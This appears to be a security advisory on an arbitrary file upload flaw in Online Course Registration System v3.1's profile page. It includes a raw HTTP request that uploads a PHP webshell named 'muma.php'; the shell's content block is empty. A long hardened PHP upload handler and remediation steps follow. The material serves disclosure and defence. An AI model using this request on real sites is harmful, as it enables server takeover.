# Online Course Registration System v3.1 Arbitrary File Upload Vulnerability Summary

## Vulnerability Overview

* **Vulnerability Name**: Online Course Registration System v3.1 - Arbitrary File Upload Vulnerability in `/my-profile.php`
* **Vulnerability Type**: Arbitrary File Upload
* **Root Cause**: The `/my-profile.php` page does not perform effective validation or filtering on user-uploaded files, allowing attackers to upload executable PHP script files (e.g., `.php`, `.phtml`).
* **Exploitation Conditions**: Authentication required (user must be logged in as a student).

## Impact Scope

* **Affected Product**: Online Course Registration v3.1
* **Affected Version**: v3.1
* **Potential Impact**: Attackers can upload malicious WebShells and execute arbitrary commands on the server, leading to complete system compromise, sensitive data leakage, or service disruption.

## Vulnerability Exploitation Code (POC)

**Payload (WebShell Content):**

```php
```

**Raw HTTP Request (Burp Suite):**

```http
POST /onlinecourse/my-profile.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 727
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="133", "Not(A:Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/onlinecourse/my-profile.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=wm0crfha4rln2dofmxeqjxm
Connection: keep-alive

------WebKitFormBoundaryDxfpm20kZxjeT8i
Content-Disposition: form-data; name="studentname"

Anuj kumar
------WebKitFormBoundaryDxfpm20kZxjeT8i
Content-Disposition: form-data; name="studentregno"

10000121
------WebKitFormBoundaryDxfpm20kZxjeT8i
Content-Disposition: form-data; name="Pincode"

822004
------WebKitFormBoundaryDxfpm20kZxjeT8i
Content-Disposition: form-data; name="cgpa"

7.10
------WebKitFormBoundaryDxfpm20kZxjeT8i
Content-Disposition: form-data; name="photo"; filename="muma.php"
Content-Type: application/octet-stream

------WebKitFormBoundaryDxfpm20kZxjeT8i
Content-Disposition: form-data; name="submit"

------WebKitFormBoundaryDxfpm20kZxjeT8i--
```

## Remediation Measures

1. **Implement Whitelisting**: Only allow specific file extensions (e.g., `.jpg`, `.png`, `.gif`) for uploads; avoid using blacklists.
2. **Check MIME Types and File Signatures**: Verify that the file extension matches the actual content.
3. **Rename Uploaded Files**: Use randomly generated filenames to prevent attackers from guessing paths.
4. **Set Non-Executable Permissions**: Configure the server to prohibit execution of PHP scripts in the upload directory.
5. **Isolate File Storage**: Store uploaded files outside the web root directory and access them via links rather than direct exposure.
6. **Enable WAF or Security Rules**: Deploy tools such as ModSecurity to detect suspicious upload activities.
7. **Conduct Regular Security Testing**: Perform code reviews and security testing to maintain system integrity.
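Remediation steps 1 through 5 above can be applied together in one upload handler. The following is an added example written for this summary; it is not code from the Online Course Registration project, and it does not reproduce the original `my-profile.php`. It assumes the form field is still named `photo` (as in the request above), that a storage directory outside the web root exists (the path `/var/app-data/onlinecourse/photos` is a placeholder assumption), and that photos are served back through `serve_profile_photo()` rather than by a direct link into the upload directory. The function names and constants are this example's own.

```php
<?php
// Added example (not the application's own code): hardened handling of the
// profile photo upload. Assumes $_FILES['photo'] and a storage directory
// outside the web root; both paths below are assumptions for illustration.
declare(strict_types=1);

const MAX_PHOTO_BYTES = 2 * 1024 * 1024;

// Step 1: extension whitelist, each mapped to the single MIME type it may carry.
const ALLOWED_PHOTO_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

// Step 2: magic bytes expected at the start of each allowed format.
const PHOTO_SIGNATURES = [
    'image/jpeg' => ["\xFF\xD8\xFF"],
    'image/png'  => ["\x89PNG\r\n\x1a\n"],
    'image/gif'  => ["GIF87a", "GIF89a"],
];

/**
 * Validates one entry of $_FILES and stores it under a random name.
 * Returns the stored file name; throws RuntimeException on any rejection.
 */
function store_profile_photo(array $file, string $storageDir): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or no file submitted');
    }
    if ($file['size'] > MAX_PHOTO_BYTES) {
        throw new RuntimeException('File too large');
    }

    // The client-supplied name is untrusted: only its extension is consulted,
    // and only to pick the whitelist entry; it never reaches the filesystem.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_PHOTO_TYPES)) {
        throw new RuntimeException('File type not allowed');
    }
    $expectedMime = ALLOWED_PHOTO_TYPES[$ext];

    // Server-side content sniffing; the client's Content-Type header is ignored.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== $expectedMime) {
        throw new RuntimeException('File content does not match extension');
    }

    // Magic-byte check against the signature(s) for the expected format.
    $head = file_get_contents($file['tmp_name'], false, null, 0, 16);
    $signatureOk = false;
    foreach (PHOTO_SIGNATURES[$expectedMime] as $sig) {
        if ($head !== false && strncmp($head, $sig, strlen($sig)) === 0) {
            $signatureOk = true;
            break;
        }
    }
    if (!$signatureOk) {
        throw new RuntimeException('Invalid image signature');
    }

    // The image parser must agree with the extension as well.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info['mime'] !== $expectedMime) {
        throw new RuntimeException('Not a valid image');
    }

    // Step 3: server-chosen random name; step 4: no execute bit on the file.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest   = rtrim($storageDir, '/') . '/' . $stored;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    chmod($dest, 0640);
    return $stored;
}

/**
 * Step 5: serves a stored photo from outside the web root, so the storage
 * directory is never exposed directly. $name is validated against the exact
 * shape produced by store_profile_photo() before it touches the filesystem.
 */
function serve_profile_photo(string $name, string $storageDir): void
{
    if (!preg_match('/^[0-9a-f]{32}\.(jpe?g|png|gif)$/', $name)) {
        http_response_code(404);
        return;
    }
    $path = rtrim($storageDir, '/') . '/' . $name;
    if (!is_file($path)) {
        http_response_code(404);
        return;
    }
    $ext = pathinfo($name, PATHINFO_EXTENSION);
    header('Content-Type: ' . ALLOWED_PHOTO_TYPES[$ext]);
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: inline; filename="' . $name . '"');
    header('Content-Length: ' . (string) filesize($path));
    readfile($path);
}

// Usage inside the profile handler (storage path is an assumption):
// $photo = store_profile_photo($_FILES['photo'], '/var/app-data/onlinecourse/photos');
// Persist $photo in the student's record and render <img src="photo.php?n=...">.
```

The checks are deliberately layered: the whitelist alone would still accept a PHP script renamed to `.jpg`, and content sniffing alone can be fooled by a polyglot, so the extension, the detected MIME type, the leading signature bytes, and the image parser all have to agree before the file is written. If a deployment cannot move the directory outside the web root, step 4 still applies: disable script execution for that location in the web server configuration so that even a file which slips through is served as static content rather than run by the PHP interpreter.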